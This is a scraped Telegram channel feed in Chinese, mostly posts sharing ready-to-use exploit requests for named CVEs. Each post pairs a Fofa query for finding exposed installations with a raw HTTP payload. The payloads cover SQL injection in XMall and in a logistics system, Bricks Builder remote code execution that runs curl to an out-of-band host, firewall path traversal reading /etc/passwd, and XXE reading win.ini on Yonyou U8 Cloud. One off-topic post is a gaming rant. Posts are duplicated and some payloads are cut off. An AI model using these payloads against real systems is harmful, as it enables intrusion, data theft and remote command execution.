Forwarded from Sydney的自留地
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
XMall 开源商城 SQL注入漏洞(CVE-2024-24112)
Fofa:app="XMall-后台管理系统"
GET /item/list?draw=1&order[0][column]=1&order[0][dir]=desc)a+union+select+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e),1)%23;&start=0&length=1&search[value]=&search[regex]=false&cid=-1&_=1679041197136 HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=B37FC1C79B186EB92EE17EA23D316B09; Hm_lvt_90194188523e0a2d04ad3ad170c83f30=1708396293; Hm_lpvt_90194188523e0a2d04ad3ad170c83f30=1708396293Upgrade-Insecure-Requests: 1
Fofa:app="XMall-后台管理系统"
GET /item/list?draw=1&order[0][column]=1&order[0][dir]=desc)a+union+select+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e),1)%23;&start=0&length=1&search[value]=&search[regex]=false&cid=-1&_=1679041197136 HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=B37FC1C79B186EB92EE17EA23D316B09; Hm_lvt_90194188523e0a2d04ad3ad170c83f30=1708396293; Hm_lpvt_90194188523e0a2d04ad3ad170c83f30=1708396293Upgrade-Insecure-Requests: 1
👍2
WordPress Bricks Builder远程命令执行漏洞(CVE-2024-25600)
fofa:body="/wp-content/themes/bricks/"
GET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101 Firefox/96.0Connection: closeAccept-Encoding: gzip, deflate
获取nonce值
第二步执行rce
POST /wp-json/bricks/v1/render_element HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0Connection: closeContent-Length: 401Content-Type: application/jsonAccept-Encoding: gzip, deflate{ "postId": "1", "nonce": "c5b5949**", "element": { "name": "container", "settings": { "hasLoop": "true", "query": { "useQueryEditor": true, "queryEditor": "ob_start();echo
fofa:body="/wp-content/themes/bricks/"
GET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101 Firefox/96.0Connection: closeAccept-Encoding: gzip, deflate
获取nonce值
第二步执行rce
POST /wp-json/bricks/v1/render_element HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0Connection: closeContent-Length: 401Content-Type: application/jsonAccept-Encoding: gzip, deflate{ "postId": "1", "nonce": "c5b5949**", "element": { "name": "container", "settings": { "hasLoop": "true", "query": { "useQueryEditor": true, "queryEditor": "ob_start();echo
curl cnc4ej5blq62an78ck6giyhcffmdr5t56.oast.pro;$output=ob_get_contents();ob_end_clean();throw new Exception($output);", "objectType": "post" } } }}❤1
Media is too big
VIEW IN TELEGRAM
究极卡比
对面虚空平移双十字刀那么长的判定贴脸戳不掉血,然后莫名其妙挨延迟刀离着十万八千里框框挨打跟特么闹鬼一样
这特么能被反杀了气得我今天晚上觉都睡不着了
对面虚空平移双十字刀那么长的判定贴脸戳不掉血,然后莫名其妙挨延迟刀离着十万八千里框框挨打跟特么闹鬼一样
这特么能被反杀了气得我今天晚上觉都睡不着了
H3C下一代防火墙任意文件读取漏洞
product="H3C-下一代防火墙"
/webui/?g=sys_corefile_sysinfo_download&file_name=../../../etc/passwd
product="H3C-下一代防火墙"
/webui/?g=sys_corefile_sysinfo_download&file_name=../../../etc/passwd
东胜物流软件-SaveUserQuerySetting接口存在SQL注入漏洞
POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-input
POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-input
❤1
用友U8 Cloud smartweb2.RPC.d xxe漏洞
app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1Host: 192.168.40.131:8088User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25Content-Length: 260Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewMoxml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="="__profileKeys">%26Password;</p ></vps></rpc>
(执行查看C:/windows/win.ini命令)
app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1Host: 192.168.40.131:8088User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25Content-Length: 260Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewMoxml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="="__profileKeys">%26Password;</p ></vps></rpc>
(执行查看C:/windows/win.ini命令)